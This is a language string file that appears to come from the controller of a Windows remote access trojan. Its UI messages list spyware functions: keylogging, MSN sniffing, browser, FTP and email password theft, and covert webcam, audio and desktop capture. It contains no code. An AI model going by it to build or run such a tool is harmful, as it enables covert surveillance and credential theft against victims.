lng125=Audio streaming stopped
lng126=Log transfer stopped
lng127=Lost connection!
lng128=Online keylogger started
lng129=Online keylogger stopped
lng130=No webcam
lng131=Can't start webcam connection,webcam can be busy
lng132=Webcam list received
lng133=Can't retrieve passwords
lng134=Plugin file has been added to the upload list
lng135=Waiting
lng136=File successfully downloaded and executed
lng137=File successfully downloaded
lng138=File can't be downloaded
lng139=Service list received
lng140=Registry list received
lng141=Logs received
lng142=File(s) found
lng143=Passwords received
lng144=Server closed
lng145=Server settings received
lng146=Service uninstalled
lng147=Service stopped
lng148=Service started
lng149=Server settings saved
lng150=User Response : 
lng151=Computer shutdowned
lng152=Computer restarted
lng153=Windows logged off
lng154=Infinite messages have been sent
lng155=Screen flipped vertically
lng156=Screen flipped horizontally
lng157=System clock is hidden
lng158=System clock is visible
lng159=Monitör oppened
lng160=Monitör closed
lng161=CD-Rom oppened
lng162=CD-Rom closed
lng163=Taskbar locked
lng164=Taskbar unlocked
lng165=Taskbar is hidden
lng166=Taskbar is visible
lng167=Desktop is hidden
lng168=Desktop is visible
lng169=Desktop locked
lng170=Desktop unlocked
lng171=Start Button is hidden
lng172=Start Button is visible
lng173=Start Button locked
lng174=Start Button unlocked
lng175=Task icons are hidden
lng176=Task icons are visible
lng177=Keyboard lights are off
lng178=Keyboard lights are on
lng179=Ctrl+Alt+Del locked
lng180=Ctrl+Alt+Del unlocked
lng181=Alt+Tab locked
lng182=Alt+Tab unlocked
lng183=Num-Lock state changed
lng184=Caps-Lock state changed
lng185=Scroll-Lock state changed
lng186=Keyboard locked
lng187=Keyboard unlocked
lng188=Resolution changed
lng189=Application showed
lng190=Application windows flashed
lng191=Application window closed
lng192=Application is hidden
lng193=X button is hidden
lng194=Application is active
lng195=Application window locked
lng196=Application maximized
lng197=Application minimize
lng198=Web-page oppened
lng199=IE start page changed
lng200=Crazy mouse is active
lng201=Mouse buttons changed
lng202=Mouse buttons set default
lng203=Mouse locked
lng204=Audio streaming stopped
lng205=Conversation started
lng206=Listennin server side..
lng207=Mouse unlocked
lng208=Bungi mouse is active.
lng209=Bungi mouse closed
lng210=Clipboard text set
lng211=Clipboard locked
lng212=Clipboard unlocked
lng213=Date set
lng214=Date can't be set
lng215=Time set
lng216=Time can''t be set
lng217=Clipboard text set
lng218=Mouse tail set
lng219=Double click speed set
lng220=Crazy mouse closed
lng221=Application title changed
lng222=Connected to :
lng223=No webcam found
lng224=Other password received
lng225=Application list received
lng226=Running proccess received
lng227=Visited pages received
lng228=Double click speed received
lng229=System information received
lng230=Clipboard text received
lng231=Avaliable resolutions received
lng232=Blocked web-sites received
lng233=Settings saved
lng234=Online msn sniffer stopped
lng235=Online msn sniffer started
lng236=Chat window closed
lng237=Chat windows oppened
lng238=Folder created
lng239=File renamed
lng240=File deleted
lng241=File can''t be deleted
lng242=File zipped!
lng243=File can''t be zipped!
lng244=Folder zipped!
lng245=Files can''t be zipped!
lng246=Installed applications received
lng247=Folder deleted
lng248=Folder can''t be deleted
lng249=Other passwords received
lng250=Remote desktop connection established..
lng251=Webcam connection established..
lng252=Audio connection established..
lng253= nicknamed user is online
lng254=[ Connected : 
lng255=[Online : 
lng256=Changing application title..
lng257=Learning running processes..
lng258=Terminating application...
lng259=Showing application...
lng260=Hiding application...
lng261=Hiding X button...
lng262=Flashing application window...
lng263=Maximizing window..
lng264=Minimizing window..
lng265=Activating application window...
lng266=Locking application window..
lng267=Receiving avaliable resolutions..
lng268=Changing resolution...
lng269=Start chatting...
lng270=Error message sent
lng271=Activating online keylogger...
lng272=Closing online keylogger...
lng273=Receiving system information...
lng274=Hiding desktop...
lng275=Showing desktop...
lng276=Locking desktop...
lng277=Unlocking desktop...
lng278=Hiding start button...
lng279=Showing start button...
lng280=Locking start button...
lng281=Unlocking start button...
lng282=Hiding task icons...
lng283=Showing task icons...
lng284=Hiding system clock...
lng285=Showing system clock...
lng286=Oppenning monitor...
lng287=Closing monitor...
lng288=Oppenning CD-Rom...
lng289=Closing CD-Rom...
lng290=Locking Taskbar...
lng291=Unlocking Taskbar...
lng292=Hiding Taskbar...
lng293=Showing Taskbar...
lng294=Finding files...
lng295=Receiving clipboard text...
lng296=Setting clipboard text...
lng297=Setting clipboard text...
lng298=Locking clipboard...
lng299=Unlocking clipboard...
lng300=Closing chat window...
lng301=Locking Ctrl+Alt+Del...
lng302=Unlocking Ctrl+Alt+Del...
lng303=Locking Alt+Tab...
lng304=Unlocking Alt+Tab...
lng305=Locking Num-Lock...
lng306=Unlocking Num-Lock...
lng307=Locking Caps-Lock...
lng308=Unlocking Caps-Lock...
lng309=Locking Scroll-Lock...
lng310=Unlocking Scroll-Lock...
lng311=Locking keyboard...
lng312=Unlocking keyboard...
lng313=Turning keyboard lights off...
lng314=Turning keyboard lights on...
lng315=Receiving server settings...
lng316=Saving server settings...
lng317=Closing server...
lng318=Uninstalling server...
lng319=Receiving Instant Messenger Passwords..
lng320=Receiving E-Posta Passwords..
lng321=Receiving Dialer Passwords..
lng322=Receiving Browser Passwords..
lng323=Receiving FTP Passwords..
lng324=Receiving Downloader Passwords..
lng325=Receiving Other Passwords..
lng326=Shutting computer down...
lng327=Rebooting...
lng328=Logging Windows off...
lng329=Flipping screen vertically...
lng330=Flipping screen horizontally...
lng331=Sending infinite messages...
lng332=Opening crazy mouse...
lng333=Closing crazy mouse...
lng334=Changing mouse buttons...
lng335=Setting mouse buttons to default...
lng336=Locking mouse...
lng337=Unlocking mouse...
lng338=Opening bungi mouse...
lng339=Closing bungi mouse...
lng340=Getting double click speed...
lng341=Setting double click speed...
lng342=Setting length of mouse tail...
lng343=Controlling mouse : 
lng344=Installing plugin...
lng345=Receiving logs...
lng346=Oppenning Web-Page...
lng347=Changing start page...
lng348=Receiving visited pages...
lng349=Receiving service list...
lng350=Uninstalling service...
lng351=Stopping service...
lng352=Starting service...
lng353=Refreshing application list...
lng354=Terminating application...
lng355=Receiving installed applications..
lng356=Establishing remote desktop connection..
lng357=Receiving stream..
lng358=Establishing webcam connection...
lng359=Receiving webcam list...
lng360=Stopping audio streaming...
lng361=Establishing audio connection...
lng362=Downloading file..
lng363=Receiving logs...
lng364=Starting online msn sniffer...
lng365=Online msn sniffer stopped
lng366=Receiving blocked web-sites..
lng367=Saving settings..
lng368= Testing...
lng369= Port is OK
lng370= Port has a problem
lng371= - You have sent a nudge
lng372=Waiting
lng373=Testing...
lng374=Settings saved and server created!
lng375=Operating System
lng376=Is Admin
lng377=UpTime
lng378=Idle
lng379=Computer Name
lng380=User Name
lng381=Cpu Brand
lng382=Cpu Name
lng383=Windows Language
lng384=Resolution
lng385=Num-lock
lng386=Caps-lock
lng387=Scroll-lock
lng388=Explorer
lng389=Antivirus
lng390=Firewall
lng391=Mac Address
lng392=Windows Folder
lng393=System Folder
lng394=Temp Folder
lng395=Direct-x Version
lng396=Disk Space
lng397=Clipboard is empty or not in text format
lng398=Clipboard has changed :
lng399=Date / Time
lng400=Close Server
lng401=Send
lng402=Are you sure that you want to close server?
lng403=Warning
lng404=new value
lng405=new value name
lng406=Block Web Site
lng407=Site Address :
lng408=Stop
lng409=Start
lng410=Stop controlling
lng411=Start controlling
lng412=Send CTRL+ALT+DEL key combination
lng413=Change screen quality
lng414=Full screen / Normal screen
lng415=Save Picture
lng416=Remote Desktop
lng417=Okay
lng418=Cancel
lng419=Abort
lng420=Retry
lng421=Ignore
lng422=Yes
lng423=No
lng424=Unknown
lng425=Open
lng426=Closed
lng427=File executed
lng428=Can't execute file
lng429=Application terminated
lng430=Can't terminate application